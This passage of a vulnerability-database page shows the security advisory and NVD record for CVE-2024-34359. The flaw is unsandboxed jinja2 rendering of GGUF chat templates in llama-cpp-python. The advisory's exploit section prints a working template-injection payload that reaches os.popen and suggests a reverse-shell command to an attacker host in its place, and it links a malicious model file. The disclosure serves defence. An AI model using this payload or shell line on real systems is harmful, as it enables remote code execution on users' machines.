template = self.metadata[\"tokenizer.chat_template\"]\n                try:\n                    eos_token_id = int(self.metadata[\"tokenizer.ggml.eos_token_id\"])\n                except:\n                    eos_token_id = self.token_eos()\n                try:\n                    bos_token_id = int(self.metadata[\"tokenizer.ggml.bos_token_id\"])\n                except:\n                    bos_token_id = self.token_bos()\n\n                eos_token = self._model.token_get_text(eos_token_id)\n                bos_token = self._model.token_get_text(bos_token_id)\n\n                if self.verbose:\n                    print(f\"Using gguf chat template: {template}\", file=sys.stderr)\n                    print(f\"Using chat eos_token: {eos_token}\", file=sys.stderr)\n                    print(f\"Using chat bos_token: {bos_token}\", file=sys.stderr)\n\n                self.chat_handler = llama_chat_format.Jinja2ChatFormatter(\n                    template=template,\n                    eos_token=eos_token,\n                    bos_token=bos_token,\n                    stop_token_ids=[eos_token_id],\n                ).to_chat_handler()\n\n        if self.chat_format is None and self.chat_handler is None:\n            self.chat_format = \"llama-2\"\n            if self.verbose:\n                print(f\"Using fallback chat format: {chat_format}\", file=sys.stderr)\n                \n```\n\nIn `llama.py`, `llama-cpp-python` defined the fundamental class for model initialization parsing (Including `NUMA, LoRa settings`, `loading tokenizers,` and stuff ). In our case, we will be focusing on the parts where it processes `metadata`; it first checks if `chat_format` and `chat_handler` are `None` and checks if the key `tokenizer.chat_template` exists in the metadata dictionary `self.metadata`. If it exists, it will try to guess the `chat format` from the `metadata`. If the guess fails, it will get the value of `chat_template` directly from `self.metadata.self.metadata` is set during class initialization and it tries to get the metadata by calling the model\u0027s metadata() method, after that, the `chat_template` is parsed into `llama_chat_format.Jinja2ChatFormatter` as params which furthermore stored the `to_chat_handler()` as `chat_handler`\n\n### `llama_chat_format.py` -\u003e `Jinja2ChatFormatter`:\n\n`self._environment =  jinja2.Environment( -\u003e from_string(self.template) -\u003e self._environment.render(`\n\n```python\nclass ChatFormatter(Protocol):\n    \"\"\"Base Protocol for a chat formatter. A chat formatter is a function that\n    takes a list of messages and returns a chat format response which can be used\n    to generate a completion. The response can also include a stop token or list\n    of stop tokens to use for the completion.\"\"\"\n\n    def __call__(\n        self,\n        *,\n        messages: List[llama_types.ChatCompletionRequestMessage],\n        **kwargs: Any,\n    ) -\u003e ChatFormatterResponse: ...\n\n\nclass Jinja2ChatFormatter(ChatFormatter):\n    def __init__(\n        self,\n        template: str,\n        eos_token: str,\n        bos_token: str,\n        add_generation_prompt: bool = True,\n        stop_token_ids: Optional[List[int]] = None,\n    ):\n        \"\"\"A chat formatter that uses jinja2 templates to format the prompt.\"\"\"\n        self.template = template\n        self.eos_token = eos_token\n        self.bos_token = bos_token\n        self.add_generation_prompt = add_generation_prompt\n        self.stop_token_ids = set(stop_token_ids) if stop_token_ids is not None else None\n\n        self._environment = jinja2.Environment(\n            loader=jinja2.BaseLoader(),\n            trim_blocks=True,\n            lstrip_blocks=True,\n        ).from_string(self.template)\n\n    def __call__(\n        self,\n        *,\n        messages: List[llama_types.ChatCompletionRequestMessage],\n        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,\n        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,\n        tools: Optional[List[llama_types.ChatCompletionTool]] = None,\n        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,\n        **kwargs: Any,\n    ) -\u003e ChatFormatterResponse:\n        def raise_exception(message: str):\n            raise ValueError(message)\n\n        prompt = self._environment.render(\n            messages=messages,\n            eos_token=self.eos_token,\n            bos_token=self.bos_token,\n            raise_exception=raise_exception,\n            add_generation_prompt=self.add_generation_prompt,\n            functions=functions,\n            function_call=function_call,\n            tools=tools,\n            tool_choice=tool_choice,\n        )\n\n```\n\nAs we can see in `llama_chat_format.py` -\u003e `Jinja2ChatFormatter`, the constructor `__init__` initialized required `members` inside of the class; Nevertheless, focusing on this line:\n\n```python\n        self._environment = jinja2.Environment(\n            loader=jinja2.BaseLoader(),\n            trim_blocks=True,\n            lstrip_blocks=True,\n        ).from_string(self.template)\n```\n\nFun thing here: `llama_cpp_python` directly loads the `self.template` (`self.template = template` which is the `chat template` located in the `Metadate` that is parsed as a param) via `jinja2.Environment.from_string(` without setting any sandbox flag or using the protected `immutablesandboxedenvironment `class. This is extremely unsafe since the attacker can implicitly tell `llama_cpp_python` to load malicious `chat template` which is furthermore rendered in the `__call__` constructor, allowing RCEs or Denial-of-Service since `jinja2`\u0027s renderer evaluates embed codes like `eval()`, and we can utilize expose method by exploring the attribution such as `__globals__`, `__subclasses__` of pretty much anything.\n\n```python\n    def __call__(\n        self,\n        *,\n        messages: List[llama_types.ChatCompletionRequestMessage],\n        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,\n        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,\n        tools: Optional[List[llama_types.ChatCompletionTool]] = None,\n        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,\n        **kwargs: Any,\n    ) -\u003e ChatFormatterResponse:\n        def raise_exception(message: str):\n            raise ValueError(message)\n\n        prompt = self._environment.render( # rendered!\n            messages=messages,\n            eos_token=self.eos_token,\n            bos_token=self.bos_token,\n            raise_exception=raise_exception,\n            add_generation_prompt=self.add_generation_prompt,\n            functions=functions,\n            function_call=function_call,\n            tools=tools,\n            tool_choice=tool_choice,\n        )\n```\n\n## Exploiting\n\nFor our exploitation, we first downloaded [qwen1_5-0_5b-chat-q2_k.gguf](https://huggingface.co/Qwen/Qwen1.5-0.5B-Chat-GGUF/blob/main/qwen1_5-0_5b-chat-q2_k.gguf) of `Qwen/Qwen1.5-0.5B-Chat-GGUF` on `huggingface` as the base of the exploitation, by importing the file to `Hex-compatible` editors (In my case I used the built-in `Hex editor` or `vscode`), you can try to search for key `chat_template` (imported as `template = self.metadata[\"tokenizer.chat_template\"]` in `llama-cpp-python`):\n\n\u003cimg src=\"https://raw.githubusercontent.com/retr0reg/0reg-uploads/main/img/202405021808647.png\" alt=\"image-20240502180804562\" style=\"zoom: 25%;\" /\u003e\n\n`qwen1_5-0_5b-chat-q2_k.gguf` appears to be using the OG `role+message` and using the fun `jinja2` syntax. By first replacing the original `chat_template` in `\\x00`, then inserting our SSTI payload. We constructed this payload which firstly iterates over the subclasses of the base class of all classes in Python. The expression `().__class__.__base__.__subclasses__()` retrieves a list of all subclasses of the basic `object` class and then we check if its `warning` by `if \"warning\" in x.__name__`, if it is , we access its module via the `_module` attribute then access Python\u0027s built-in functions through `__builtins__` and uses the `__import__` function to import the `os` module and finally we called `os.popen` to `touch /tmp/retr0reg`, create an empty file call `retr0reg` under `/tmp/`\n\n```python\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__[\u0027__import__\u0027](\u0027os\u0027).popen(\"touch /tmp/retr0reg\")}}{%endif%}{% endfor %}\n```\n\nin real life exploiting instance, we can change `touch /tmp/retr0reg` into arbitrary codes like `sh -i \u003e\u0026 /dev/tcp/\u003cHOST\u003e/\u003cPORT\u003e 0\u003e\u00261` to create a reverse shell connection to specified host, in our case we are using `touch /tmp/retr0reg` to showcase the exploitability of this vulnerability.\n\n\u003cimg src=\"https://raw.githubusercontent.com/retr0reg/0reg-uploads/main/img/202405022009159.png\" alt=\"image-20240502200909127\" style=\"zoom:50%;\" /\u003e\n\nAfter these steps, we got ourselves a malicious model with an embedded payload in `chat_template` of the `metahead`, in which will be parsed and rendered by `llama.py:class Llama:init -\u003e  self.chat_handler `-\u003e `llama_chat_format.py:Jinja2ChatFormatter:init -\u003e  self._environment = jinja2.Environment(` -\u003e ``llama_chat_format.py:Jinja2ChatFormatter:call -\u003e self._environment.render(`\n\n*(The uploaded malicious model file is in https://huggingface.co/Retr0REG/Whats-up-gguf )*\n\n```python\nfrom llama_cpp import Llama\n\n# Loading locally:\nmodel = Llama(model_path=\"qwen1_5-0_5b-chat-q2_k.gguf\")\n# Or loading from huggingface:\nmodel = Llama.from_pretrained(\n    repo_id=\"Retr0REG/Whats-up-gguf\",\n    filename=\"qwen1_5-0_5b-chat-q2_k.gguf\",\n    verbose=False\n)\n\nprint(model.create_chat_completion(messages=[{\"role\": \"user\",\"content\": \"what is the meaning of life?\"}]))\n```\n\nNow when the model is loaded whether as ` Llama.from_pretrained` or `Llama` and chatted, our malicious code in the `chat_template` of the `metahead` will be triggered and execute arbitrary code. \n\nPoC video here: https://drive.google.com/file/d/1uLiU-uidESCs_4EqXDiyKR1eNOF1IUtb/view?usp=sharing\n",
  "id": "GHSA-56xg-wfcc-g829",
  "modified": "2024-05-20T22:24:26Z",
  "published": "2024-05-13T14:10:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/abetlen/llama-cpp-python"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata"
}

FKIE_CVE-2024-34359

Vulnerability from fkie_nvd - Published: 2024-05-14 15:38 - Updated: 2024-11-21 09:18

Severity ?

9.6 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df
	security-advisories@github.com	https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload."
    },
    {
      "lang": "es",
      "value": "llama-cpp-python son los enlaces de Python para llama.cpp. `llama-cpp-python` depende de la clase `Llama` en `llama.py` para cargar `.gguf` llama.cpp o modelos de aprendizaje autom\u00e1tico de latencia. El constructor `__init__` integrado en `Llama` toma varios par\u00e1metros para configurar la carga y ejecuci\u00f3n del modelo. Adem\u00e1s de `NUMA, configuraci\u00f3n de LoRa`, `carga de tokenizadores` y `configuraci\u00f3n de hardware`, `__init__` tambi\u00e9n carga la `plantilla de chat` desde los metadatos `.gguf` espec\u00edficos y adem\u00e1s la analiza en `llama_chat_format.Jinja2ChatFormatter.to_chat_handler ()` para construir el `self.chat_handler` para este modelo. Sin embargo, `Jinja2ChatFormatter` analiza la `plantilla de chat` dentro del Metadate con `jinja2.Environment` sin zona de pruebas, que adem\u00e1s se representa en `__call__` para construir el `mensaje` de interacci\u00f3n. Esto permite la inyecci\u00f3n de plantilla del lado del servidor `jinja2`, lo que conduce a la ejecuci\u00f3n remota de c\u00f3digo mediante un payload cuidadosamente construida."
    }
  ],
  "id": "CVE-2024-34359",
  "lastModified": "2024-11-21T09:18:30.130",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.6,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-05-14T15:38:45.093",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-76"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-34359 (GCVE-0-2024-34359)

GHSA-56XG-WFCC-G829

Description

Source-to-Sink

llama.py -> class Llama -> __init__:

llama_chat_format.py -> Jinja2ChatFormatter:

Exploiting

FKIE_CVE-2024-34359

Tags

Sightings

Nomenclature

`llama.py` -> `class Llama` -> `init`:

`llama_chat_format.py` -> `Jinja2ChatFormatter`: